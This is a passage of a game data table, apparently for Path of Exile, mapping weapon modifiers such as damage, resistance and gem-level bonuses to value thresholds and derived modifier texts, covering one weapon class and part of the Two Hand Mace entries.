"#% chance for Bleeding inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Bleeding'), (140, '(19 - 23)% increased Damage with Bleeding'), (500, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (30 - 35)% faster')],
"#% chance for Poisons inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Poison'), (140, '(19 - 23)% increased Damage with Poison'), (500, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (30 - 35)% faster')],
"#% chance to Cast Level 20 Fire Burst on Hit": [(11, '(33 - 36)% increased Fire Damage'), (22, '(37 - 40)% increased Fire Damage'), (50, '(41 - 44)% increased Fire Damage')],
"#% chance to Intimidate Enemies for 4 seconds on Hit": [(16, '(4 - 5)% chance to Intimidate Enemies for 4 seconds on Hit'), (32, '(6 - 7)% chance to Intimidate Enemies for 4 seconds on Hit'), (100, '(8 - 10)% chance to Intimidate Enemies for 4 seconds on Hit')],
"#% chance to Trigger a Socketed Spell when you Use a Skill": [(250, 'Triggered Spells deal (27 - 32)% increased Spell Damage'), (500, 'Triggered Spells deal (33 - 38)% increased Spell Damage')],
"#% chance to cause Bleeding on Hit": [(50, '(14 - 18)% increased Damage with Bleeding'), (100, '(19 - 23)% increased Damage with Bleeding'), (300, '(24 - 28)% increased Damage with Bleeding\n(15 - 20)% chance to cause Bleeding on Hit')],
"#% chance to deal Double Damage": [(18, '4% chance to deal Double Damage'), (50, '5% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(90, '(29 - 35)% increased Attack Damage\n(29 - 35)% increased Spell Damage'), (200, '(36 - 44)% increased Attack Damage\n(36 - 44)% increased Spell Damage')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(44, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% chance to gain a Power, Frenzy or Endurance Charge on Kill": [(18, '(8 - 11)% increased Endurance Charge Duration\n(8 - 11)% increased Frenzy Charge Duration\n(8 - 11)% increased Power Charge Duration'), (36, '(12 - 15)% increased Endurance Charge Duration\n(12 - 15)% increased Frenzy Charge Duration\n(12 - 15)% increased Power Charge Duration'), (100, '(5 - 10)% chance to gain an Endurance Charge on Kill\n(5 - 10)% chance to gain a Frenzy Charge on Kill\n(5 - 10)% chance to gain a Power Charge on Kill')],
"#% increased Attack Speed": [(30, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed'), (100, '(7 - 8)% increased Attack Speed')],
"#% increased Attack Speed while a Rare or Unique Enemy is Nearby": [(56, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% increased Bleeding Duration": [(20, '(14 - 18)% increased Damage with Bleeding'), (40, '(19 - 23)% increased Damage with Bleeding'), (100, '(24 - 28)% increased Damage with Bleeding\n(8 - 12)% increased Bleeding Duration')],
"#% increased Chaos Damage": [(110, '(29 - 32)% increased Chaos Damage'), (220, '(33 - 36)% increased Chaos Damage'), (500, '(37 - 40)% increased Chaos Damage')],
"#% increased Cold Damage": [(100, '(29 - 32)% increased Cold Damage'), (200, '(33 - 36)% increased Cold Damage'), (300, '(37 - 40)% increased Cold Damage'), (350, '(41 - 44)% increased Cold Damage'), (1000, '(20 - 30)% increased Frostbite Curse Effect')],
"#% increased Critical Strike Chance": [(25, '(5 - 6)% increased Critical Strike Chance'), (50, '(7 - 8)% increased Critical Strike Chance'), (75, '(9 - 10)% increased Critical Strike Chance'), (100, '(11 - 12)% increased Critical Strike Chance'), (200, '(13 - 15)% increased Critical Strike Chance')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Damage per Endurance Charge": [(16, '2% increased Damage per Endurance Charge'), (50, '(4 - 5)% increased Damage per Endurance Charge')],
"#% increased Damage per Frenzy Charge": [(16, '2% increased Damage per Frenzy Charge'), (50, '(4 - 5)% increased Damage per Frenzy Charge')],
"#% increased Damage per Power Charge": [(16, '2% increased Damage per Power Charge'), (50, '(4 - 5)% increased Damage per Power Charge')],
"#% increased Damage when on Full Life": [(130, '(21 - 26)% increased Damage'), (260, '(27 - 32)% increased Damage'), (500, '(33 - 38)% increased Damage')],
"#% increased Damage with Bleeding": [(45, '(14 - 18)% increased Damage with Bleeding'), (90, '(19 - 23)% increased Damage with Bleeding'), (200, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (30 - 35)% faster')],
"#% increased Elemental Damage": [(130, '(21 - 26)% increased Elemental Damage'), (260, '(27 - 32)% increased Elemental Damage'), (500, '(33 - 38)% increased Elemental Damage\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Elemental Damage with Attack Skills": [(50, 'Attacks with this Weapon Penetrate 2% Elemental Resistances'), (100, 'Attacks with this Weapon Penetrate 3% Elemental Resistances'), (300, 'Attacks with this Weapon Penetrate (4 - 5)% Elemental Resistances')],
"#% increased Fire Damage": [(100, '(29 - 32)% increased Fire Damage'), (200, '(33 - 36)% increased Fire Damage'), (300, '(37 - 40)% increased Fire Damage'), (350, '(41 - 44)% increased Fire Damage'), (1000, '(20 - 30)% increased Flammability Curse Effect')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\nKilled Enemies Explode, dealing 5% of their Life as Physical Damage')],
"#% increased Lightning Damage": [(100, '(29 - 32)% increased Lightning Damage'), (200, '(33 - 36)% increased Lightning Damage'), (300, '(37 - 40)% increased Lightning Damage'), (350, '(41 - 44)% increased Lightning Damage'), (1000, '(20 - 30)% increased Conductivity Curse Effect')],
"#% increased Physical Damage": [(200, '(13 - 14)% increased Physical Damage'), (400, '(15 - 16)% increased Physical Damage'), (600, '(17 - 19)% increased Physical Damage'), (725, '(20 - 22)% increased Physical Damage'), (1000, '(23 - 25)% increased Physical Damage')],
"#% increased Spell Damage": [(125, '(22 - 24)% increased Spell Damage'), (250, '(25 - 28)% increased Spell Damage'), (375, '(29 - 35)% increased Spell Damage'), (420, '(45 - 51)% increased Spell Damage'), (1000, 'Spells have a (16 - 18)% chance to deal Double Damage')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(26 - 35)% increased Stun Duration on Enemies')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(1.17, '(7 - 9)% increased maximum Energy Shield'), (2.33, '(10 - 13)% increased maximum Energy Shield'), (8.33, '(14 - 16)% increased maximum Energy Shield')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.4% of Mana Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '3.0% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '1.0% of Physical Attack Damage Leeched as Mana')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '1 to Maximum Endurance Charges')],
"#% reduced Enemy Stun Threshold": [(30, '(5 - 6)% reduced Enemy Stun Threshold'), (35, '(7 - 8)% reduced Enemy Stun Threshold'), (200, '(9 - 10)% reduced Enemy Stun Threshold')],
"#% reduced Soul Cost of Vaal Skills": [(55, 'Vaal Skills deal (36 - 44)% increased Damage'), (110, 'Vaal Skills deal (45 - 51)% increased Damage'), (200, '(60 - 70)% increased Attack Damage if Corrupted')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(45 - 50) Life gained for each Enemy hit by your Attacks')],
"+# to Accuracy Rating": [(500, '(10 - 15)% increased Global Accuracy Rating'), (1000, '(20 - 25)% increased Global Accuracy Rating'), (2000, '(30 - 35)% increased Global Accuracy Rating')],
"+# to Armour if you've Hit an Enemy Recently": [(1100, '(14 - 16)% increased Armour'), (2200, '(17 - 19)% increased Armour'), (5000, '(20 - 22)% increased Armour')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating if Hit an Enemy Recently": [(1100, '(14 - 16)% increased Evasion Rating'), (2200, '(17 - 19)% increased Evasion Rating'), (5000, '(20 - 22)% increased Evasion Rating')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Gems": [(1, '(2 - 3) to Quality of Socketed Gems'), (2, '(4 - 6) to Quality of Socketed Gems'), (10, '1 to Level of Socketed Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Melee Gems": [(3, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems'), (10, '1 to Level of Socketed Melee Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Level of Socketed Support Gems": [(3, '(2 - 3) to Quality of Socketed Support Gems'), (5, '(4 - 6) to Quality of Socketed Support Gems'), (10, '1 to Level of Socketed Support Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, 'Adds (2 - 3) to (4 - 5) Fire Damage to Attacks with this Weapon per 10 Strength')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to Weapon range": [(7, '1 to Weapon range'), (20, '2 to Weapon range')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+#% Critical Strike Multiplier while a Rare or Unique Enemy is Nearby": [(60, '(18 - 20) to Global Critical Strike Multiplier'), (120, '(21 - 23) to Global Critical Strike Multiplier'), (150, '(24 - 26) to Global Critical Strike Multiplier')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(25, '(15 - 17) to Global Critical Strike Multiplier'), (50, '(18 - 20) to Global Critical Strike Multiplier'), (75, '(21 - 23) to Global Critical Strike Multiplier'), (100, '(24 - 26) to Global Critical Strike Multiplier'), (200, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"Adds # to # Chaos Damage": [(300, 'Adds (7 - 12) to (15 - 26) Chaos Damage'), (450, 'Adds (13 - 21) to (27 - 49) Chaos Damage'), (1000, 'Adds (22 - 43) to (50 - 74) Chaos Damage')],
"Adds # to # Cold Damage": [(120, 'Adds (5 - 8) to (11 - 18) Cold Damage'), (240, 'Adds (9 - 15) to (19 - 28) Cold Damage'), (300, 'Adds (16 - 22) to (29 - 39) Cold Damage'), (360, 'Adds (23 - 30) to (40 - 53) Cold Damage'), (1000, 'Adds (31 - 37) to (44 - 65) Cold Damage')],
"Adds # to # Cold Damage to Spells": [(100, 'Adds (4 - 6) to (8 - 13) Cold Damage to Spells'), (180, 'Adds (7 - 11) to (14 - 20) Cold Damage to Spells'), (250, 'Adds (12 - 16) to (21 - 28) Cold Damage to Spells'), (280, 'Adds (17 - 21) to (28 - 38) Cold Damage to Spells'), (1000, 'Adds (22 - 26) to (31 - 46) Cold Damage to Spells')],
"Adds # to # Fire Damage": [(150, 'Adds (7 - 12) to (13 - 21) Fire Damage'), (300, 'Adds (13 - 19) to (22 - 35) Fire Damage'), (375, 'Adds (20 - 27) to (36 - 48) Fire Damage'), (450, 'Adds (28 - 35) to (49 - 64) Fire Damage'), (1000, 'Adds (36 - 45) to (65 - 80) Fire Damage')],
"Adds # to # Fire Damage to Spells": [(100, 'Adds (5 - 9) to (10 - 15) Fire Damage to Spells'), (200, 'Adds (10 - 14) to (16 - 25) Fire Damage to Spells'), (275, 'Adds (14 - 19) to (26 - 34) Fire Damage to Spells'), (320, 'Adds (20 - 25) to (35 - 45) Fire Damage to Spells'), (1000, 'Adds (26 - 32) to (46 - 56) Fire Damage to Spells')],
"Adds # to # Lightning Damage": [(200, 'Adds 1 to (25 - 40) Lightning Damage'), (400, 'Adds (1 - 3) to (41 - 65) Lightning Damage'), (550, 'Adds (2 - 5) to (66 - 82) Lightning Damage'), (650, 'Adds (2 - 7) to (83 - 106) Lightning Damage'), (1000, 'Adds (3 - 9) to (107 - 125) Lightning Damage')],
"Adds # to # Lightning Damage to Spells": [(150, 'Adds 1 to (18 - 28) Lightning Damage to Spells'), (300, 'Adds (1 - 3) to (29 - 46) Lightning Damage to Spells'), (450, 'Adds (2 - 4) to (47 - 58) Lightning Damage to Spells'), (540, 'Adds (2 - 5) to (59 - 75) Lightning Damage to Spells'), (1000, 'Adds (3 - 7) to (75 - 88) Lightning Damage to Spells')],
"Adds # to # Physical Damage": [(50, 'Adds 1 to (2 - 3) Physical Damage'), (100, 'Adds (2 - 3) to (4 - 5) Physical Damage'), (150, 'Adds (4 - 5) to (6 - 7) Physical Damage'), (180, 'Adds (6 - 7) to (8 - 10) Physical Damage'), (500, 'Adds (8 - 9) to (11 - 13) Physical Damage')],
"Attacks with this Weapon Penetrate #% Chaos Resistance": [(22, '(25 - 28)% increased Chaos Damage'), (44, '(29 - 32)% increased Chaos Damage'), (100, '(33 - 36)% increased Chaos Damage')],
"Attacks with this Weapon Penetrate #% Elemental Resistances": [(22, '(21 - 26)% increased Elemental Damage'), (44, '(27 - 32)% increased Elemental Damage'), (100, '(33 - 38)% increased Elemental Damage\nAttacks with this Weapon Penetrate 3% Elemental Resistances')],
"Auras from your Skills grant #% increased Damage to you and Allies": [(5, 'You and Allies affected by your Aura Skills deal (13 - 16)% increased Damage'), (9, 'You and Allies affected by your Aura Skills deal (17 - 21)% increased Damage'), (20, 'You and Allies affected by your Aura Skills deal (22 - 25)% increased Damage')],
"Curse Enemies with Level # Despair on Hit": [(11, '(29 - 32)% increased Chaos Damage'), (22, '(33 - 36)% increased Chaos Damage'), (50, '(37 - 40)% increased Chaos Damage')],
"Damage Penetrates #% Cold Resistance": [(22, '(33 - 36)% increased Cold Damage'), (44, '(37 - 40)% increased Cold Damage'), (100, '(41 - 44)% increased Cold Damage')],
"Damage Penetrates #% Fire Resistance": [(22, '(33 - 36)% increased Fire Damage'), (44, '(37 - 40)% increased Fire Damage'), (100, '(41 - 44)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(22, '(33 - 36)% increased Lightning Damage'), (44, '(37 - 40)% increased Lightning Damage'), (100, '(41 - 44)% increased Lightning Damage')],
"Gain #% of Cold Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Cold Damage'), (70, '(37 - 40)% increased Cold Damage'), (100, '(41 - 44)% increased Cold Damage\nGain (7 - 10)% of Cold Damage as Extra Chaos Damage')],
"Gain #% of Fire Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Fire Damage'), (70, '(37 - 40)% increased Fire Damage'), (100, '(41 - 44)% increased Fire Damage\nGain (7 - 10)% of Fire Damage as Extra Chaos Damage')],
"Gain #% of Lightning Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Lightning Damage'), (70, '(37 - 40)% increased Lightning Damage'), (100, '(41 - 44)% increased Lightning Damage\nGain (7 - 10)% of Lightning Damage as Extra Chaos Damage')],
"Gain #% of Non-Chaos Damage as extra Chaos Damage": [(10, '(25 - 28)% increased Chaos Damage'), (20, '(29 - 32)% increased Chaos Damage'), (50, '(33 - 36)% increased Chaos Damage')],
"Gain #% of Physical Damage as Extra Chaos Damage": [(35, '(27 - 32)% increased Global Physical Damage'), (70, '(33 - 38)% increased Global Physical Damage'), (100, '(39 - 44)% increased Global Physical Damage\nGain (7 - 10)% of Physical Damage as Extra Chaos Damage')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Hits can't be Evaded": [(1, '(10 - 15)% increased Global Accuracy Rating'), (2, '(20 - 25)% increased Global Accuracy Rating'), (5, '(30 - 35)% increased Global Accuracy Rating\n100% increased Global Accuracy Rating')],
"Minions deal #% increased Damage": [(90, 'Minions deal (19 - 22)% increased Damage'), (140, 'Minions deal (27 - 32)% increased Damage'), (180, 'Minions deal (23 - 26)% increased Damage'), (280, 'Minions deal (33 - 38)% increased Damage'), (500, 'Minions deal (27 - 30)% increased Damage'), (500, 'Minions deal (39 - 44)% increased Damage')],
"Socketed Skills deal #% more Attack Damage": [(22, '(29 - 35)% increased Attack Damage'), (44, '(36 - 44)% increased Attack Damage'), (100, '(45 - 51)% increased Attack Damage')],
"Socketed Skills deal #% more Spell Damage": [(22, '(29 - 35)% increased Spell Damage'), (44, '(36 - 44)% increased Spell Damage'), (100, '(45 - 51)% increased Spell Damage')],
"Triggers Level 20 Spectral Spirits when Equipped": [(4, 'Minions deal (11 - 12)% increased Damage'), (7, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage')],
"Your Hits inflict Decay, dealing 500 Chaos Damage per second for 8 seconds": [(1, '(25 - 28)% increased Chaos Damage'), (2, '(29 - 32)% increased Chaos Damage'), (10, '(33 - 36)% increased Chaos Damage')],
},
"Two Hand Mace": {
"#% chance for Bleeding inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Bleeding'), (140, '(19 - 23)% increased Damage with Bleeding'), (500, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (30 - 35)% faster')],
"#% chance for Poisons inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Poison'), (140, '(19 - 23)% increased Damage with Poison'), (500, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (30 - 35)% faster')],
"#% chance to Cast Level 20 Fire Burst on Hit": [(11, '(33 - 36)% increased Fire Damage'), (22, '(37 - 40)% increased Fire Damage'), (50, '(41 - 44)% increased Fire Damage')],
"#% chance to Intimidate Enemies for 4 seconds on Hit": [(16, '(4 - 5)% chance to Intimidate Enemies for 4 seconds on Hit'), (32, '(6 - 7)% chance to Intimidate Enemies for 4 seconds on Hit'), (100, '(8 - 10)% chance to Intimidate Enemies for 4 seconds on Hit')],
"#% chance to Trigger a Socketed Spell when you Use a Skill": [(250, 'Triggered Spells deal (27 - 32)% increased Spell Damage'), (500, 'Triggered Spells deal (33 - 38)% increased Spell Damage')],
"#% chance to cause Bleeding on Hit": [(50, '(14 - 18)% increased Damage with Bleeding'), (100, '(19 - 23)% increased Damage with Bleeding'), (300, '(24 - 28)% increased Damage with Bleeding\n(15 - 20)% chance to cause Bleeding on Hit')],
"#% chance to deal Double Damage": [(18, '4% chance to deal Double Damage'), (50, '5% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(90, '(29 - 35)% increased Attack Damage\n(29 - 35)% increased Spell Damage'), (200, '(36 - 44)% increased Attack Damage\n(36 - 44)% increased Spell Damage')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(44, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% chance to gain a Power, Frenzy or Endurance Charge on Kill": [(18, '(8 - 11)% increased Endurance Charge Duration\n(8 - 11)% increased Frenzy Charge Duration\n(8 - 11)% increased Power Charge Duration'), (36, '(12 - 15)% increased Endurance Charge Duration\n(12 - 15)% increased Frenzy Charge Duration\n(12 - 15)% increased Power Charge Duration'), (100, '(5 - 10)% chance to gain an Endurance Charge on Kill\n(5 - 10)% chance to gain a Frenzy Charge on Kill\n(5 - 10)% chance to gain a Power Charge on Kill')],
"#% increased Attack Speed": [(30, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed'), (100, '(7 - 8)% increased Attack Speed')],
"#% increased Attack Speed while a Rare or Unique Enemy is Nearby": [(56, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% increased Bleeding Duration": [(20, '(14 - 18)% increased Damage with Bleeding'), (40, '(19 - 23)% increased Damage with Bleeding'), (100, '(24 - 28)% increased Damage with Bleeding\n(8 - 12)% increased Bleeding Duration')],
"#% increased Chaos Damage": [(110, '(29 - 32)% increased Chaos Damage'), (220, '(33 - 36)% increased Chaos Damage'), (500, '(37 - 40)% increased Chaos Damage')],
"#% increased Cold Damage": [(100, '(29 - 32)% increased Cold Damage'), (200, '(33 - 36)% increased Cold Damage'), (300, '(37 - 40)% increased Cold Damage'), (350, '(41 - 44)% increased Cold Damage'), (1000, '(20 - 30)% increased Frostbite Curse Effect')],
"#% increased Critical Strike Chance": [(25, '(5 - 6)% increased Critical Strike Chance'), (50, '(7 - 8)% increased Critical Strike Chance'), (75, '(9 - 10)% increased Critical Strike Chance'), (100, '(11 - 12)% increased Critical Strike Chance'), (200, '(13 - 15)% increased Critical Strike Chance')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Damage per Endurance Charge": [(16, '2% increased Damage per Endurance Charge'), (50, '(4 - 5)% increased Damage per Endurance Charge')],
"#% increased Damage per Frenzy Charge": [(16, '2% increased Damage per Frenzy Charge'), (50, '(4 - 5)% increased Damage per Frenzy Charge')],
"#% increased Damage per Power Charge": [(16, '2% increased Damage per Power Charge'), (50, '(4 - 5)% increased Damage per Power Charge')],
"#% increased Damage when on Full Life": [(130, '(21 - 26)% increased Damage'), (260, '(27 - 32)% increased Damage'), (500, '(33 - 38)% increased Damage')],
"#% increased Damage with Bleeding": [(45, '(14 - 18)% increased Damage with Bleeding'), (90, '(19 - 23)% increased Damage with Bleeding'), (200, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (30 - 35)% faster')],
"#% increased Elemental Damage": [(130, '(21 - 26)% increased Elemental Damage'), (260, '(27 - 32)% increased Elemental Damage'), (500, '(33 - 38)% increased Elemental Damage\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Elemental Damage with Attack Skills": [(50, 'Attacks with this Weapon Penetrate 2% Elemental Resistances'), (100, 'Attacks with this Weapon Penetrate 3% Elemental Resistances'), (300, 'Attacks with this Weapon Penetrate (4 - 5)% Elemental Resistances')],
"#% increased Fire Damage": [(100, '(29 - 32)% increased Fire Damage'), (200, '(33 - 36)% increased Fire Damage'), (300, '(37 - 40)% increased Fire Damage'), (350, '(41 - 44)% increased Fire Damage'), (1000, '(20 - 30)% increased Flammability Curse Effect')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\nKilled Enemies Explode, dealing 5% of their Life as Physical Damage')],
"#% increased Lightning Damage": [(100, '(29 - 32)% increased Lightning Damage'), (200, '(33 - 36)% increased Lightning Damage'), (300, '(37 - 40)% increased Lightning Damage'), (350, '(41 - 44)% increased Lightning Damage'), (1000, '(20 - 30)% increased Conductivity Curse Effect')],
"#% increased Physical Damage": [(200, '(13 - 14)% increased Physical Damage'), (400, '(15 - 16)% increased Physical Damage'), (600, '(17 - 19)% increased Physical Damage'), (725, '(20 - 22)% increased Physical Damage'), (1000, '(23 - 25)% increased Physical Damage')],
"#% increased Spell Damage": [(125, '(22 - 24)% increased Spell Damage'), (250, '(25 - 28)% increased Spell Damage'), (375, '(29 - 35)% increased Spell Damage'), (420, '(45 - 51)% increased Spell Damage'), (1000, 'Spells have a (16 - 18)% chance to deal Double Damage')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(26 - 35)% increased Stun Duration on Enemies')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(1.17, '(7 - 9)% increased maximum Energy Shield'), (2.33, '(10 - 13)% increased maximum Energy Shield'), (8.33, '(14 - 16)% increased maximum Energy Shield')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.4% of Mana Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '3.0% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '1.0% of Physical Attack Damage Leeched as Mana')],
